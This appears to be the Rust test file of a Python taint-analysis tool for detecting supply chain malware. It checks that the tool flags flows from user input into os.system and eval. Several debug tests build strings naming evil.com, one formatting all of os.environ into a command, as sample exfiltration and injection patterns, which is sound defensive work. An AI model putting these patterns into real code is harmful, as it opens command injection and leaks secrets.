pyrograph 0.1.0

GPU-accelerated taint analysis for supply chain malware detection
Documentation
#![cfg(feature = "python")]

use pyrograph::{analyze, parse::parse_python};

fn assert_detects(name: &str, source: &str) {
    let graph = parse_python(source, &format!("{name}.py")).unwrap();
    let findings = analyze(&graph).unwrap();
    assert!(!findings.is_empty(), "expected finding for {name}: {findings:?}");
}

fn assert_clean(name: &str, source: &str) {
    let graph = parse_python(source, &format!("{name}.py")).unwrap();
    let findings = analyze(&graph).unwrap();
    assert!(findings.is_empty(), "unexpected finding for {name}: {findings:?}");
}

// 1. import statements (aliased module, attribute access)
#[test]
fn tp_import_alias_system() {
    assert_detects("tp_import_alias_system", "import os as o\ncmd = input()\no.system(cmd)\n");
}

// 2. from X import Y (aliased function)
#[test]
fn tp_from_import_alias_system() {
    assert_detects("tp_from_import_alias_system", "from os import system as s\ncmd = input()\ns(cmd)\n");
}

// 3. with open(path) as f: data = f.read() (context manager taint flow)
#[test]
fn tp_with_open_fstring_system() {
    assert_detects(
        "tp_with_open_fstring_system",
        "import os\nwith open('x') as f:\n    data = f.read()\ncmd = f'echo {data}'\nos.system(cmd)\n",
    );
}

// 4. List comprehensions [x for x in data]
#[test]
fn tp_list_comp_system() {
    assert_detects(
        "tp_list_comp_system",
        "import os\ndata = input()\nitems = [x for x in data]\nos.system(items[0])\n",
    );
}

// 5. f-string interpolation f'{secret}' → taint flows through
#[test]
fn tp_fstring_system() {
    assert_detects(
        "tp_fstring_system",
        "import os\nsecret = input()\ncmd = f'echo {secret}'\nos.system(cmd)\n",
    );
}

#[test]
fn fp_fstring_sanitized() {
    assert_clean(
        "fp_fstring_sanitized",
        "import os\nsecret = input()\nsafe = int(secret)\ncmd = f'echo {safe}'\nos.system(cmd)\n",
    );
}

// 6. **kwargs unpacking with interprocedural keyword flow
#[test]
fn tp_kwargs_interprocedural() {
    assert_detects(
        "tp_kwargs_interprocedural",
        "import os\ndef run(*, cmd):\n    os.system(cmd)\npayload = input()\nkwargs = {'shell': True}\nrun(cmd=payload, **kwargs)\n",
    );
}

// 7. Decorator pattern @app.route (tainted decorator arg to sink decorator)
#[test]
fn tp_decorator_sink() {
    assert_detects(
        "tp_decorator_sink",
        "from flask import request\n@eval(request.form['code'])\ndef handler(): pass\n",
    );
}

#[test]
fn tp_nested_decorator_sink() {
    assert_detects(
        "tp_nested_decorator_sink",
        "from flask import request\n@app.route('/')\n@eval(request.form['code'])\ndef handler(): pass\n",
    );
}

// 8. try/except blocks (exception handling taint flow)
#[test]
fn tp_try_except_input_system() {
    assert_detects(
        "tp_try_except_input_system",
        "import os\ntry:\n    pass\nexcept:\n    cmd = input()\n    os.system(cmd)\n",
    );
}

#[test]
fn tp_try_except_raise_flow() {
    assert_detects(
        "tp_try_except_raise_flow",
        "try:\n    raise input()\nexcept Exception as e:\n    eval(e)\n",
    );
}

#[test]
fn debug_format_taint() {
    let source = r#"
import os
secret = input()
cmd = 'https://evil.com/{}'.format(secret)
os.system(cmd)
"#;
    let graph = parse_python(source, "test.py").unwrap();
    let findings = analyze(&graph).unwrap();
    eprintln!("findings count: {}", findings.len());
    for node in graph.nodes() {
        eprintln!("  {} {:?} {:?} {:?}", node.id, node.kind, node.name, node.label);
    }
    for (from, kind) in graph.edges_from(0) {
        eprintln!("  edge from 0 -> {} {:?}", from, kind);
    }
}

#[test]
fn debug_format_taint2() {
    let source = r#"
import os
secret = input()
cmd = 'https://evil.com/{}'.format(secret)
os.system(cmd)
"#;
    let graph = parse_python(source, "test.py").unwrap();
    let findings = analyze(&graph).unwrap();
    eprintln!("findings count: {}", findings.len());
    for f in &findings {
        eprintln!("finding: source={} sink={} path={:?}", f.source, f.sink, f.path);
    }
    for node in graph.nodes() {
        for (to, kind) in graph.edges_from(node.id) {
            eprintln!("edge: {} -> {} {:?}", node.id, to, kind);
        }
    }
}

#[test]
fn debug_fstring_taint2() {
    let source = r#"
secret = input()
cmd = f'https://evil.com/{secret}'
eval(cmd)
"#;
    let graph = parse_python(source, "test.py").unwrap();
    let findings = analyze(&graph).unwrap();
    eprintln!("fstring findings count: {}", findings.len());
    for f in &findings {
        eprintln!("finding: source={} sink={} path={:?}", f.source, f.sink, f.path);
    }
    for node in graph.nodes() {
        for (to, kind) in graph.edges_from(node.id) {
            eprintln!("edge: {} -> {} {:?}", node.id, to, kind);
        }
    }
}

#[test]
fn debug_format_locals() {
    let source = r#"
import os
secret = input()
cmd = 'https://evil.com/{}'.format(**locals())
os.system(cmd)
"#;
    let graph = parse_python(source, "test.py").unwrap();
    let findings = analyze(&graph).unwrap();
    eprintln!("format(**locals) findings count: {}", findings.len());
    for f in &findings {
        eprintln!("finding: source={} sink={} path={:?}", f.source, f.sink, f.path);
    }
    for node in graph.nodes() {
        eprintln!("  {} {:?} {:?}", node.id, node.kind, node.name);
        for (to, kind) in graph.edges_from(node.id) {
            eprintln!("    edge -> {} {:?}", to, kind);
        }
    }
}

#[test]
fn debug_fstring_complex() {
    let source = r#"
import os
obj = type('X', (), {})()
obj.secret = input()
cmd = f'https://evil.com/{obj.secret}'
os.system(cmd)
"#;
    let graph = parse_python(source, "test.py").unwrap();
    let findings = analyze(&graph).unwrap();
    eprintln!("fstring complex findings count: {}", findings.len());
    for f in &findings {
        eprintln!("finding: source={} sink={} path={:?}", f.source, f.sink, f.path);
    }
}

#[test]
fn debug_format_os_environ() {
    let source = r#"
import os
cmd = 'https://evil.com/{}'.format(**os.environ)
os.system(cmd)
"#;
    let graph = parse_python(source, "test.py").unwrap();
    let findings = analyze(&graph).unwrap();
    eprintln!("format(**os.environ) findings count: {}", findings.len());
    for f in &findings {
        eprintln!("finding: source={} sink={} path={:?}", f.source, f.sink, f.path);
    }
    for node in graph.nodes() {
        eprintln!("  {} {:?} {:?}", node.id, node.kind, node.name);
        for (to, kind) in graph.edges_from(node.id) {
            eprintln!("    edge -> {} {:?}", to, kind);
        }
    }
}